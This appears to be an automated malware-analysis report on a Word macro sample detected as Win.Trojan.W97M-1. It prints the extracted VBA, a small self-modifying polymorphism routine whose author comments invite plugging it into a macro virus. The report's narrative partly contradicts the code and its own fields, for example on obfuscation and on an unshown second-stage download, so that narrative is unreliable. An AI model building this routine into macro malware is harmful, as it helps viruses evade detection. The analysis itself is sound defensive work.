MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-1. It contains VBA macros, indicated by the 'OLE_VBA_MACROS' heuristic. The extracted VBA code, named 'macros.bas', appears to be a simple obfuscation routine that modifies its own source code by prepending comments containing application details. While the exact payload is not directly executed or evident, the presence of obfuscated macros strongly suggests an intent to download and execute a second-stage payload.
Heuristics 2
- ClamAV: Win.Trojan.W97M-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.W97M-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 794 bytes |

SHA-256: abd19f4cf648dbf0dcd9903384f12acd7225a7f3c64b1db9230116368da3140e
Detection: ClamAV: Win.Trojan.W97M-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VSMP_DEMO"
Function VSMP()
Y = Application.VBE.ActiveVBProject.VBComponents("VSMP_DEMO").CodeModule.CountOfLines
With Application.VBE.ActiveVBProject.VBComponents("VSMP_DEMO").CodeModule
For x = 2 To Y Step 2
.ReplaceLine x, "' " & Application.UserInitials & Now & Application.UserName & Application.ActivePrinter & Now
Next x
End With
End Function
' Vic's Simple Macro Poly
' Replace "VSMP_DEMO" with the name of your macro vius
' Remove these comments
' peace,
' VicodinES /CB /TNN
```